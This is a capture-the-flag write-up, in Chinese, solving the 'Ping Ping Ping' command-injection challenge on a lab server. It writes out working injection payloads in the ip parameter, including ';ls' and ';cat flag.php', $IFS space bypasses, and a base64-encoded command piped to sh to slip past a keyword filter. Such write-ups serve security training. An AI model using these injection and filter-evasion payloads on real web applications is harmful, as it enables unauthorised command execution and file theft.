BUU-[GXYCTF2019]Ping Ping Ping

考察点

命令执行

题目

解题

简单测试

?ip应该是一个提示,那么就测试一下?ip=127.0.0.1

复制代码
http://0c02a46a-5ac2-45f5-99da-3d1b0b951307.node4.buuoj.cn:81/?ip=127.0.0.1

发现正常回显

列出文件

那么猜测一下可能会有命令执行漏洞,测试?ip=127.0.0.1;ls

复制代码
http://0c02a46a-5ac2-45f5-99da-3d1b0b951307.node4.buuoj.cn:81/?ip=127.0.0.1;ls

发现有flag.php文件和index.php文件

查看flag.php文件

?ip=127.0.0.1;cat flag.php

复制代码
http://0c02a46a-5ac2-45f5-99da-3d1b0b951307.node4.buuoj.cn:81/?ip=127.0.0.1;cat%20flag.php

发现回显不是flag值,估计是被过滤了

猜测可能是空格被过滤了,尝试用 I F S {IFS} IFS 进行代替

复制代码
http://0c02a46a-5ac2-45f5-99da-3d1b0b951307.node4.buuoj.cn:81/?ip=127.0.0.1;cat${IFS}$flag.php

发现也得不到flag值,猜测可能还过滤了{},那么使用 {IFS}1 进行代替

复制代码
http://0c02a46a-5ac2-45f5-99da-3d1b0b951307.node4.buuoj.cn:81/?ip=127.0.0.1;cat${IFS}$1flag.php

依旧没有得到flag值

查看index.php

复制代码
http://0c02a46a-5ac2-45f5-99da-3d1b0b951307.node4.buuoj.cn:81/?ip=127.0.0.1;cat$IFS$1index.php

这下过滤了啥就一目了然了

flag字眼过滤了,bash也没了,不过sh没过滤

先对cat flag.php进行base64编码得到:Y2F0IGZsYWcucGhw

复制代码
http://0c02a46a-5ac2-45f5-99da-3d1b0b951307.node4.buuoj.cn:81/?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

echo        是打印
$IFS$1      是空格
Y2F0IGZsYWcucGhw        是cat flag.php的base编码
|           是管道符
base64$IFS$1-d      是base64 -d的意思,就是对Y2F0IGZsYWcucGhw进行base64解密
sh          是执行传递过来的cat flag.php命令

查看返回页面的源码可以得到flag

复制代码
flag{19795c98-007a-46f5-a449-5f6ae6410dd5}

总结

命令执行各种绕过总结:

复制代码
https://blog.csdn.net/m0_64815693/article/details/127268809

https://blog.csdn.net/Thunderclap_/article/details/129178221


复制代码
echo${IFS}Y2F0IDEudHh0|base64${IFS}-d|sh
相关推荐
FreeBuf_44 分钟前
GNU Screen 曝多漏洞:本地提权与终端劫持风险浮现
安全·web安全·gnu
苏生要努力2 小时前
第九届御网杯网络安全大赛初赛WP
linux·python·网络安全
2501_915909062 小时前
iOS App 安全性探索:源码保护、混淆方案与逆向防护日常
websocket·网络协议·tcp/ip·http·网络安全·https·udp
禾木KG6 小时前
网络安全-等级保护(等保) 2-3 GB/T 22240—2020《信息安全技术 网络安全等级保护定级指南》-2020-04-28发布【现行】
网络安全
python算法(魔法师版)6 小时前
API安全
网络·物联网·网络协议·安全·网络安全
it技术分享just_free6 小时前
软考教材重点内容 信息安全工程师 第24章 工控安全需求分析与安全保护工程
web安全·网络安全·信息安全·系统安全·软考
mooyuan天天7 小时前
upload-labs通关笔记-第2关 文件上传之MIME绕过
web安全·文件上传·文件上传漏洞·mime·upload-labs靶场
Johny_Zhao7 小时前
Ubuntu安装部署Zabbix网络监控平台和设备配置添加
linux·网络·mysql·网络安全·信息安全·云计算·apache·zabbix·shell·yum源·系统运维·itsm
mooyuan天天9 小时前
upload-labs通关笔记-第3关 文件上传之黑名单绕过
web安全·文件上传·文件上传漏洞·upload-labs靶场
~西贝贝~11 小时前
二元随机响应(Binary Randomized Response, RR)的翻转概率
网络安全